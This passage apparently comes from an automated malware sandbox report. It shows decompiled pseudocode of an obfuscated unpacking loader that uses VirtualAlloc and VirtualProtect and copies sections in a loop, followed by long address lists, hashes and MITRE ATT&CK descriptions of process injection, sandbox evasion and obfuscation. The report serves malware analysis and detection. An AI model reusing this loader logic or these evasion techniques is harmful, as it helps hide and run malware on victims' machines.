					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) & 0x00000000;
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) ^ _t981 & 0x00000000 ^ _t771;
					 *_t418 = _t981;
					_t986 = _v12;
					 *_t1144 = 2;
					_v12 = _v12 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t986;
					_t423 = _t824 + 0x41cfff; // 0x41cfff
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t423;
					_t773 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _v12, _t824);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + _t773;
					_t425 = _t824 + 0x41c3b9; // 0x41c3b9
					 *_t1144 =  *_t1144 - _t1112;
					 *_t1144 =  *_t1144 | _t425;
					_t775 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _t986);
					_t1132 =  &(_t1144[1]);
					 *_t427 = _t775;
					_v20 = _v20 + (_t916 & 0x00000000 |  *_t1144);
					_push(_v20);
					_pop(_t776);
					_t1054 = _t1052;
					 *_t1132 = _t1054;
					_t879 =  *(_t824 + 0x41d0fa);
					_t1057 = 0;
					if(_t879 > _t776) {
						_t432 = _t824 + 0x41cfff; // 0x41cfff
						 *_t1132 =  *_t1132 - _t1112;
						 *_t1132 =  *_t1132 + _t432;
						_t433 = _t824 + 0x41c3b9; // 0x41c3b9
						 *_t1132 =  *_t1132 ^ _t1112;
						 *_t1132 =  *_t1132 + _t433;
						_t788 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1112, _t1112);
						_v12 = _t1097;
						 *((intOrPtr*)(_t824 + 0x41d019)) = _t788;
						_t1097 = _v12;
					}
					_pop( *_t438);
					_t987 = _v12;
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 = _t987;
					_t440 = _t824 + 0x41c42d; // 0x41c42d
					 *_t1132 =  *_t1132 - _t1097;
					 *_t1132 =  *_t1132 + _t440;
					_t778 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1097, _t824);
					 *_t1132 = _t1057;
					 *((intOrPtr*)(_t824 + 0x41c664)) = _t778;
					_t1060 = 0;
					_v16 = _v16 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1060;
					_t446 = _t824 + 0x41c4b9; // 0x41c4b9
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t446;
					_t449 = _t824 + 0x41c298; // 0x41c298
					 *_t1132 =  *_t1132 ^ _t1097;
					 *_t1132 = _t449;
					_t781 =  *((intOrPtr*)(_t824 + 0x41f068))();
					_v16 = _t987;
					 *(_t824 + 0x41c405) = 0 ^ _t781;
					_t947 = _v16;
					VirtualProtect(_t1097, _v12, _v16, ??);
					_t455 = _t824 + 0x41c772; // 0x41c772
					_v20 = 0;
					 *_t1132 =  *_t1132 ^ _t455;
					_t458 = _t824 + 0x41cb5c; // 0x41cb5c
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 =  *_t1132 | _t458;
					_t785 =  *((intOrPtr*)(_t824 + 0x41f068))(_t824, _v20);
					_v12 = _t1060;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) & 0x00000000;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) | _t1060 - _v12 ^ _t785;
					_t1023 = _v12;
				}
				_pop( *_t467);
				_v16 = 0;
				 *_t1132 =  *_t1132 + _t824 + 0x41d305;
				 *_t1132 =  *_t1132 ^ _t879;
				 *_t1132 =  *_t1132 | _t824 + 0x0041cf53;
				_t701 =  *((intOrPtr*)(_t824 + 0x41f068))(_t879, _v16);
				_v16 = _t947;
				 *(_t824 + 0x41c775) = 0 ^ _t701;
				_t950 = _v16;
				_t1026 = (_t1023 & 0x00000000 | _v12) + 0xf8;
				_t827 = _t824;
				_v20 = 0;
				 *_t1132 =  *_t1132 ^ _t827 + 0x0041d2fb;
				_v16 = _v16 & 0x00000000;
				 *_t1132 =  *_t1132 + _t827 + 0x41c2ea;
				_push( *((intOrPtr*)(_t827 + 0x41f068))(_v16, _v20));
				_pop( *_t485);
				_push(_v12);
				_pop( *_t487);
				do {
					 *_t1132 = _t1026;
					 *_t1132 =  *_t1132 ^ _t879;
					 *_t1132 =  *_t1132 ^ _t827 + 0x0041c966;
					_t706 =  *((intOrPtr*)(_t827 + 0x41f060))(_t879, _v16);
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 | _t706;
					 *_t1132 = _t827 + 0x41ca40;
					_t708 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, _v20);
					_t1133 = _t1132 - 0xfffffffc;
					 *_t497 = _t708;
					_v12 = _v12 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v12);
					_pop(_t709);
					_t1028 = _t1026;
					_v16 = _t950;
					_t882 = 0 ^  *(_t827 + 0x41d332);
					_t953 = _v16;
					if(_t882 > _t709) {
						 *_t1133 =  *_t1133 ^ _t1112;
						 *_t1133 = _t827 + 0x41c966;
						 *_t1133 =  *_t1133 & 0x00000000;
						 *_t1133 =  *_t1133 | _t827 + 0x0041ca40;
						_t709 =  *((intOrPtr*)(_t827 + 0x41f064))(_t882, _t1112);
					}
					 *_t1133 = _t882;
					 *((intOrPtr*)(_t827 + 0x41c6bc)) = _t709;
					_v20 = _t1028;
					_t1031 = _v20;
					_v20 = _v20 & 0x00000000;
					 *_t1133 =  *_t1133 + _t827 + 0x41c5f7;
					_t711 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, 0);
					 *_t1133 = _t711;
					_v16 = _v16 & 0x00000000;
					 *_t1133 =  *_t1133 | _t827 + 0x0041c637;
					_t713 =  *((intOrPtr*)(_t827 + 0x41f060))(_v16, _v12);
					_t1134 =  &(_t1133[1]);
					_v20 = _a4;
					_push( *_t1133 + _t713);
					_t1085 = _v20;
					_pop(_t714);
					_push( *((intOrPtr*)(_t827 + 0x41cece)));
					_pop( *_t525);
					_push(_v20);
					_pop(_t888);
					if(_t888 > _t714) {
						 *_t1134 =  *_t1134 - _t888;
						 *_t1134 =  *_t1134 ^ _t827 + 0x0041c5f7;
						_v20 = _v20 & 0x00000000;
						 *_t1134 =  *_t1134 | _t827 + 0x0041c637;
						_t714 =  *((intOrPtr*)(_t827 + 0x41f064))(_v20, _t888);
					}
					_v12 = _t1085;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) & 0x00000000;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) | _t1085 ^ _v12 | _t714;
					 *_t1134 = _t1112;
					_t889 = 0 ^  *(_t1031 + 0x10);
					_t1112 = 0;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 ^ _t889;
					_v20 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041cee6;
					 *_t1134 =  *_t1134 ^ _t1112;
					 *_t1134 =  *_t1134 + _t827 + 0x41c9b9;
					_t717 =  *((intOrPtr*)(_t827 + 0x41f068))(_v20, _t714);
					_v20 = _t1031;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) & 0x00000000;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) ^ (_t1031 & 0x00000000 | _t717);
					_t1034 = _v20;
					 *_t552 = _t1112;
					_push(_v12);
					_pop( *_t555);
					_v16 = _v16 +  *((intOrPtr*)(_t1034 + 0x14));
					_push(_v16);
					_pop(_t1089);
					_t955 = _t953;
					_v16 = 0;
					 *_t1134 =  *_t1134 ^ _t889 & 0x00000000 ^ _v20;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t827 + 0x41c452;
					_v12 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041c156;
					_t720 =  *((intOrPtr*)(_t827 + 0x41f068))(_v12, _t955, _v16);
					 *_t1134 = _t955;
					 *((intOrPtr*)(_t827 + 0x41c66c)) = _t720;
					_t958 = 0;
					_pop( *_t567);
					_t893 = _v16;
					_t1035 =  *(_t1034 + 0xc);
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t893;
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 = _t827 + 0x41c5a4;
					_t722 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112, _t1089);
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 =  *_t1134 ^ _t722;
					 *_t1134 =  *_t1134 ^ _t1035;
					 *_t1134 =  *_t1134 + _t827 + 0x41ce5b;
					_t724 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112);
					 *_t574 = _t1035;
					 *_t1134 =  *_t1134 + _t827;
					_t828 = _t724;
					_t827 = 0;
					_push( *((intOrPtr*)(_t827 + 0x41d348)));
					_pop( *_t577);
					_push(_v12);
					_pop(_t896);
					if(_t896 > _t828 + (_t893 & 0x00000000 ^ _v20)) {
						_t579 = _t827 + 0x41c5a4; // 0x41c5a4
						 *_t1134 =  *_t1134 ^ _t958;
						 *_t1134 =  *_t1134 | _t579;
						_t580 = _t827 + 0x41ce5b; // 0x41ce5b
						 *_t1134 =  *_t1134 - _t896;
						 *_t1134 =  *_t1134 | _t580;
						_t733 =  *((intOrPtr*)(_t827 + 0x41f064))(_t896, _t958);
						_v20 = _t1089;
						 *(_t827 + 0x41c50f) = 0 ^ _t733;
						_t1089 = _v20;
					}
					_v12 = _t958;
					_t1036 =  *(_t827 + 0x41c166) + _t1035;
					_t726 = memcpy(_t1036, _t1089, (_t896 & 0x00000000) +  *_t1134);
					_t1136 =  &(_t1134[4]);
					_t879 = 0;
					_t1132 = _t1136 - 0xfffffffc;
					_push(_v12);
					_t1026 =  *_t1136 + 0x28;
					_pop(_t950);
					_t588 =  &_v8;
					 *_t588 = _v8 - 1;
				} while ( *_t588 != 0);
				_pop( *_t590);
				_t1041 = _v16;
				_push(_t1112);
				 *_t594 = _t726 & 0x00000000 ^ _t1112 -  *_t1132 ^  *(_t1041 + 0x28);
				_v20 = _v20 +  *(_t827 + 0x41c166);
				_push(_v20);
				_pop(_t729);
				_t1043 = _t1041;
				 *_t1132 = _t950;
				 *((intOrPtr*)(_t827 + 0x41d140)) = _t729;
				_t966 = 0;
				_v12 = 0;
				_t1091 = _t1089 & 0x00000000 | 0 ^  *(_t827 + 0x41c166);
				_t901 = _v12;
				if(_t1091 > 0) {
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1091;
					_t730 = E03304E1A(_t827, _t901, _t966, _t1043, _t1091, _t827);
					 *_t1132 = _t1091;
					_t729 = E03302FAF(_t730, _t827, _t901, _t966, _t1043, _t1091, _v12);
				}
				_pop( *_t603);
				return _t729;
			}

0x03305f16
0x03305f16
0x03305f16
0x03305f17
0x03305f1b
0x03305f1e
0x03305f20
0x03305f23
0x03305f24
0x03305f28
0x03305f2b
0x03305f2c
0x03305f30
0x03305f39
0x03305f3a
0x03305f3d
0x03305f46
0x03305f4a
0x03305f4d
0x03305f56
0x03305f57
0x03305f5a
0x03305f5d
0x03305f63
0x03305f66
0x03305f6e
0x03305f71
0x03305f72
0x03305f75
0x03305f78
0x03305f7b
0x03305f84
0x03305f85
0x03305f88
0x03305f8b
0x03305f91
0x03305f94
0x03305f9d
0x03305f9e
0x03305fa2
0x03305fa5
0x03305fab
0x03305fb1
0x03305fb5
0x03305fb8
0x03305fbb
0x03305fbe
0x03305fc0
0x03305fcb
0x03305fd2
0x03305fda
0x03305fdd
0x03305fe6
0x03305fe7
0x03305fea
0x03305ff3
0x03305ff4
0x03305ff7
0x03305ffa
0x03305ffa
0x03306002
0x03306005
0x03306009
0x0330600d
0x03306017
0x0330601b
0x03306025
0x03306029
0x0330602c
0x03306032
0x03306039
0x0330604b
0x03306054
0x0330605e
0x03306067
0x03306068
0x0330606b
0x0330606e
0x03306074
0x0330607b
0x0330607e
0x03306088
0x0330608b
0x03306094
0x03306095
0x03306098
0x0330609b
0x033060a1
0x033060a7
0x033060ae
0x033060b7
0x033060be
0x033060c1
0x033060c8
0x033060cb
0x033060d4
0x033060db
0x033060de
0x033060e4
0x033060e7
0x033060ee
0x033060f1
0x033060f4
0x033060f7
0x033060f8
0x03306106
0x03306108
0x0330610b
0x03306114
0x03306118
0x03306124
0x03306127
0x0330612d
0x03306133
0x0330613a
0x03306140
0x03306147
0x0330614a
0x0330614f
0x03306156
0x0330615c
0x0330615f
0x03306162
0x0330616b
0x0330616e
0x03306172
0x03306176
0x0330617a
0x0330617e
0x03306188
0x0330618c
0x03306195
0x0330619c
0x0330619f
0x033061ab
0x033061b2
0x033061be
0x033061c1
0x033061c8
0x033061d1
0x033061db
0x033061de
0x033061e5
0x033061e8
0x033061f1
0x033061fb
0x033061fe
0x03306206
0x03306209
0x03306210
0x03306213
0x03306216
0x03306219
0x0330621a
0x0330621b
0x03306231
0x03306239
0x03306240
0x03306249
0x03306253
0x03306256
0x03306256
0x0330625e
0x03306265
0x0330626b
0x0330626c
0x03306276
0x03306279
0x03306283
0x0330628c
0x03306296
0x03306299
0x0330629f
0x033062a9
0x033062b5
0x033062b8
0x033062c3
0x033062c6
0x033062cd
0x033062ce
0x033062d1
0x033062d2
0x033062dd
0x033062df
0x033062e4
0x033062ec
0x033062f6
0x03306300
0x03306303
0x03306306
0x0330630c
0x03306314
0x0330631b
0x03306321
0x03306321
0x0330632a
0x0330632d
0x03306335
0x03306338
0x0330633b
0x0330633e
0x0330633f
0x03306343
0x0330634d
0x03306351
0x0330635d
0x03306360
0x03306368
0x0330636f
0x03306375
0x0330637c
0x0330637f
0x03306385
0x03306389
0x0330638c
0x03306396
0x03306399
0x033063a2
0x033063a9
0x033063ac
0x033063b4
0x033063bb
0x033063c1
0x033063c7
0x033063ca
0x033063d1
0x033063d3
0x033063dc
0x033063e6
0x033063e9
0x033063f0
0x033063f3
0x033063fd
0x03306400
0x03306403
0x03306412
0x03306417
0x0330641b
0x0330641e
0x03306420
0x03306421
0x0330642c
0x0330642e
0x03306433
0x0330643c
0x0330643f
0x03306448
0x03306452
0x03306455
0x03306455
0x03306461
0x03306468
0x0330646e
0x03306474
0x03306477
0x03306483
0x03306486
0x0330648c
0x03306494
0x0330649b
0x033064a1
0x033064a6
0x033064b2
0x033064b6
0x033064b9
0x033064c1
0x033064c5
0x033064c8
0x033064d4
0x033064db
0x033064e1
0x033064e3
0x033064e6
0x033064f2
0x033064f5
0x033064fe
0x0330650a
0x0330650d
0x03306515
0x03306518
0x0330651f
0x03306522
0x03306525
0x03306528
0x03306529
0x03306537
0x03306539
0x0330653c
0x0330653e
0x03306544
0x0330654e
0x03306551
0x03306558
0x0330655c
0x0330655f
0x0330655f
0x03306567
0x0330656e
0x03306574
0x03306575
0x03306586
0x03306590
0x03306593
0x0330659a
0x0330659e
0x033065a1
0x033065a9
0x033065b0
0x033065b6
0x033065b7
0x033065ca
0x033065cc
0x033065ce
0x033065d2
0x033065d5
0x033065db
0x033065e5
0x033065e8
0x033065ee
0x033065f6
0x033065fd
0x03306603
0x0330660b
0x03306610
0x03306618
0x0330661b
0x03306622
0x03306625
0x0330662b
0x03306632
0x03306635
0x0330663c
0x03306640
0x03306643
0x0330664a
0x0330664e
0x03306651
0x03306659
0x0330665f
0x03306666
0x03306667
0x0330666a
0x0330666b
0x03306671
0x03306674
0x03306677
0x0330667a
0x03306685
0x0330668f
0x03306693
0x03306696
0x0330669d
0x033066a0
0x033066a3
0x033066a3
0x033066a9
0x033066ac
0x033066af
0x033066c2
0x033066c6
0x033066c9
0x033066d2
0x033066dc
0x033066e8
0x033066eb
0x033066f1
0x033066f8
0x033066fe
0x03306703
0x03306706
0x0330670b
0x0330670e
0x03306713
0x0330671a
0x0330671d
0x03306720
0x03306727
0x03306730
0x0330673a
0x0330673d
0x03306743
0x0330674d
0x03306757
0x0330675b
0x0330675e
0x0330676d
0x03306774
0x03306777
0x0330677a
0x0330677d
0x0330677e
0x0330677f
0x03306781
0x0330678c
0x03306791
0x0330679a
0x0330679d
0x033067a7
0x033067ab
0x033067ae
0x033067b4
0x033067b6
0x033067bd
0x033067c3
0x033067c4
0x033067c7
0x033067cc
0x033067cf
0x033067d2
0x033067d2
0x033067d3
0x033067dd
0x033067e0
0x033067e7
0x033067f1
0x033067f4
0x033067f7
0x033067fe
0x03306801
0x0330680b
0x0330680f
0x03306812
0x0330681d
0x03306824
0x03306827
0x0330682a
0x0330682d
0x0330682e
0x0330682f
0x03306841
0x0330684c
0x03306858
0x0330685b
0x03306861
0x03306868
0x0330686e
0x03306873
0x03306876
0x0330687e
0x03306881
0x03306881
0x03306889
0x0330688d
0x03306897
0x0330689b
0x033068a4
0x033068ae
0x033068b1
0x033068bd
0x033068c4
0x033068cd
0x033068d0
0x033068d3
0x033068e0
0x033068e4
0x033068e7
0x033068f0
0x033068f7
0x03306900
0x03306901
0x03306904
0x03306907
0x03306913
0x03306916
0x03306919
0x03306926
0x0330692f
0x03306939
0x0330693c
0x03306945
0x03306951
0x03306954
0x03306960
0x03306968
0x0330696c
0x03306971
0x03306972
0x0330697d
0x0330697f
0x03306984
0x03306986
0x0330698d
0x03306990
0x03306993
0x0330699a
0x0330699d
0x033069a0
0x033069a6
0x033069ae
0x033069b5
0x033069bb
0x033069c0
0x033069c3
0x033069c6
0x033069cd
0x033069d0
0x033069d6
0x033069d9
0x033069e0
0x033069e4
0x033069e7
0x033069f0
0x033069f3
0x033069fb
0x03306a02
0x03306a08
0x03306a0b
0x03306a0e
0x03306a13
0x03306a1a
0x03306a1e
0x03306a24
0x03306a27
0x03306a30
0x03306a33
0x03306a3f
0x03306a46
0x03306a4f
0x03306a52
0x03306a56
0x03306a5d
0x03306a64
0x03306a67
0x03306a6e
0x03306a72
0x03306a75
0x03306a7c
0x03306a80
0x03306a83
0x03306a8a
0x03306a8d
0x03306a90
0x03306a9f
0x03306aa6
0x03306aa9
0x03306aac
0x03306aaf
0x03306ab0
0x03306ab3
0x03306abe
0x03306ac0
0x03306ac3
0x03306ac5
0x03306acc
0x03306acf
0x03306ad2
0x03306ad9
0x03306adc
0x03306adf
0x03306ae5
0x03306aec
0x03306af2
0x03306af2
0x03306af5
0x03306af8
0x03306afc
0x03306aff
0x03306b02
0x03306b09
0x03306b0c
0x03306b0f
0x03306b17
0x03306b1e
0x03306b24
0x03306b25
0x03306b2c
0x03306b2f
0x03306b35
0x03306b3f
0x03306b42
0x03306b49
0x03306b4c
0x03306b4f
0x03306b55
0x03306b5c
0x03306b62
0x03306b65
0x03306b6b
0x03306b71
0x03306b7b
0x03306b7e
0x03306b85
0x03306b88
0x03306b8b
0x03306b91
0x03306b99
0x03306ba0
0x03306ba6
0x03306ba6
0x03306baf
0x03306bbb
0x03306bc5
0x03306bcf
0x03306bd2
0x03306bd5
0x03306bdb
0x03306be2
0x03306be8
0x03306bf4
0x03306bf6
0x03306bfd
0x03306c07
0x03306c10
0x03306c17
0x03306c20
0x03306c21
0x03306c24
0x03306c27
0x03306c2d
0x03306c30
0x03306c3a
0x03306c3d
0x03306c40
0x03306c46
0x03306c4d
0x03306c59
0x03306c5c
0x03306c6b
0x03306c72
0x03306c75
0x03306c78
0x03306c7b
0x03306c7c
0x03306c7d
0x03306c88
0x03306c8a
0x03306c8f
0x03306c98
0x03306c9b
0x03306ca5
0x03306ca9
0x03306cac
0x03306cac
0x03306cb4
0x03306cbb
0x03306cc2
0x03306ccc
0x03306cd5
0x03306cdc
0x03306cdf
0x03306ce8
0x03306cf1
0x03306cf8
0x03306cfb
0x03306d06
0x03306d09
0x03306d10
0x03306d11
0x03306d14
0x03306d15
0x03306d1b
0x03306d1e
0x03306d21
0x03306d24
0x03306d2d
0x03306d30
0x03306d39
0x03306d40
0x03306d43
0x03306d43
0x03306d49
0x03306d51
0x03306d58
0x03306d63
0x03306d6b
0x03306d6d
0x03306d6f
0x03306d73
0x03306d7c
0x03306d86
0x03306d90
0x03306d93
0x03306d96
0x03306d9c
0x03306da4
0x03306dab
0x03306db1
0x03306dba
0x03306dc4
0x03306dc5
0x03306dc8
0x03306dcb
0x03306dce
0x03306dcf
0x03306dd0
0x03306dda
0x03306de4
0x03306de8
0x03306df1
0x03306dfb
0x03306dfe
0x03306e06
0x03306e0d
0x03306e13
0x03306e16
0x03306e19
0x03306e1c
0x03306e20
0x03306e24
0x03306e2e
0x03306e31
0x03306e34
0x03306e3b
0x03306e3e
0x03306e48
0x03306e4b
0x03306e4e
0x03306e5a
0x03306e62
0x03306e66
0x03306e6b
0x03306e6c
0x03306e72
0x03306e75
0x03306e78
0x03306e7b
0x03306e7d
0x03306e84
0x03306e87
0x03306e8a
0x03306e91
0x03306e94
0x03306e97
0x03306e9d
0x03306ea4
0x03306eaa
0x03306eaa
0x03306eb9
0x03306ec8
0x03306ec9
0x03306ec9
0x03306ec9
0x03306ed4
0x03306ed7
0x03306ee0
0x03306ee2
0x03306ee3
0x03306ee3
0x03306ee3
0x03306eec
0x03306eef
0x03306ef2
0x03306f07
0x03306f0a
0x03306f0d
0x03306f10
0x03306f11
0x03306f14
0x03306f1b
0x03306f21
0x03306f22
0x03306f31
0x03306f33
0x03306f39
0x03306f3c
0x03306f40
0x03306f43
0x03306f4b
0x03306f4e
0x03306f4e
0x03306f61
0x03306f68

APIs

VirtualProtect.KERNELBASE ref: 03306B65

Memory Dump Source

Source File: 00000005.00000002.388723838.0000000003300000.00000040.00000001.sdmp, Offset: 03300000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction ID: b13f7dbabdf80b6f092b9f759a1fa038b66cfabde9dee617bc97d45cc907205a
Opcode Fuzzy Hash: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction Fuzzy Hash: 32C21372844608EFEB049FA0C8C57EEBBF5FF48320F0989ADD895AA145D7345264CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0330709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0330709D(signed int __ebx, long __ecx, void* __edx, void* __edi, long __esi, void* __eflags) {
				void* _t47;
				signed int _t48;
				signed int _t49;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t55;
				signed int _t59;
				long _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				signed int _t68;
				void* _t72;
				signed int _t75;
				signed int _t78;
				void* _t81;
				signed int _t82;
				long _t87;
				signed int _t89;
				long _t94;
				void* _t97;
				void* _t99;
				long _t101;
				void* _t102;

				_t87 = __esi;
				_t79 = __edi;
				_t72 = __edx;
				_t59 = __ebx;
				 *_t101 = 0xffff0000;
				_t48 = E03302D42(_t47, __ebx, __ecx, __edx, __edi, __esi, __edi);
				 *_t101 =  *_t101 | _t59;
				_t60 = _t59;
				if( *_t101 != 0) {
					 *_t101 =  *_t101 + 4;
					 *_t101 =  *_t101 - _t94;
					 *_t101 =  *_t101 + 0x1000;
					 *_t101 =  *_t101 - _t60;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c22f));
					_t48 = VirtualAlloc(0, __ecx, _t60, _t94);
				}
				 *(_t94 - 8) = 0;
				_push( *(_t94 - 8));
				 *_t101 =  *_t101 ^ _t48;
				_pop( *_t6);
				 *(_t60 + 0x41c60a) = 2;
				 *_t101 = _t94;
				 *(_t60 + 0x41d10e) = _t48;
				_t97 = 0;
				if( *(_t60 + 0x41c166) > 0) {
					_t55 = _t60 + 0x41c60a;
					 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
					 *_t101 = _t55 +  *_t101;
					 *_t101 = 0x40;
					_t87 =  *_t101;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c627));
					 *_t101 =  *(_t60 + 0x41c166);
					VirtualProtect(_t55, _t87, _t101,  *(_t97 - 4));
				}
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
				_t89 = _t87;
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41ceca));
				_t99 = _t97;
				_t49 = E0330746C(_t60, _t72, _t79, _t89);
				_push( *((intOrPtr*)(_t60 + 0x41c627)));
				_pop( *_t24);
				_push( *(_t99 - 8));
				_pop(_t62);
				 *_t101 = _t62;
				_t65 = 0;
				_t67 = 0 ^  *(_t60 + 0x41c166) | 0 ^  *(_t60 + 0x41c166);
				_t81 = _t67;
				_t68 = _t65;
				if(_t67 != 0) {
					 *(_t99 - 8) = 0;
					 *_t101 =  *_t101 ^ _t81;
					_t49 = E03302A69(_t49, _t60, _t68, _t72, _t81, _t89,  *(_t99 - 8));
				}
				_t75 = _t72;
				_t51 = memset(_t81, _t49 ^ _t49, _t68 << 0);
				_t102 = _t101 + 0xc;
				_t82 = _t81 + _t68;
				if( *((intOrPtr*)(_t60 + 0x41c3f9)) != _t60) {
					_push(0);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t82 = _t82; // executed
					_t52 = E03305F16(_t51, _t60, 0, _t75, _t89); // executed
					_push(_t52);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t54 = _t52;
					_t51 = E03308F3B(_t54, _t60, 0, _t75, _t82, _t89);
				}
				 *(_t99 - 4) = _t82;
				 *(_t102 + 0x14) = _t75 & 0x00000000 | _t82 ^  *(_t99 - 4) |  *(_t60 + 0x41d140);
				 *_t41 =  *(_t60 + 0x41d140);
				_t78 =  *(_t99 - 8);
				_push(_t89);
				 *(_t99 + 4) =  *(_t99 + 4) & 0x00000000;
				 *(_t99 + 4) =  *(_t99 + 4) ^ _t89 & 0x00000000 ^ _t78;
				asm("popad");
				return _t51;
			}

0x0330709d
0x0330709d
0x0330709d
0x0330709d
0x0330709e
0x033070a5
0x033070ab
0x033070ae
0x033070af
0x033070b2
0x033070b6
0x033070ba
0x033070c1
0x033070cb
0x033070d0
0x033070d0
0x033070d6
0x033070dd
0x033070e0
0x033070e3
0x033070e9
0x033070f5
0x033070fc
0x03307102
0x0330710a
0x0330710c
0x03307112
0x03307119
0x0330711d
0x0330712b
0x0330712b
0x03307135
0x03307138
0x03307138
0x0330713e
0x03307146
0x0330714a
0x0330714b
0x03307153
0x03307157
0x03307158
0x0330715d
0x03307163
0x03307166
0x03307169
0x0330716c
0x03307179
0x0330717d
0x0330717f
0x03307181
0x03307182
0x03307184
0x0330718e
0x03307191
0x03307191
0x0330719d
0x0330719e
0x0330719e
0x0330719e
0x033071a6
0x033071a8
0x033071b0
0x033071b4
0x033071b5
0x033071ba
0x033071c2
0x033071c6
0x033071c7
0x033071c7
0x033071cc
0x033071e0
0x033071ea
0x033071f0
0x033071f1
0x033071f7
0x033071fb
0x033071ff
0x03307201

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 033070D0
VirtualProtect.KERNELBASE(?,?,?,?,00000000), ref: 03307138

Memory Dump Source

Source File: 00000005.00000002.388723838.0000000003300000.00000040.00000001.sdmp, Offset: 03300000, based on PE: true

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction ID: 69bbd726a95197ff7a5c4146a7ec48d7f604f24b85773de893ab2380206aee84
Opcode Fuzzy Hash: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction Fuzzy Hash: 8F413B72904204EFEB04DF64CCC5BAEBBF5EF88710F19849DEC88AB245C77469509B69

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

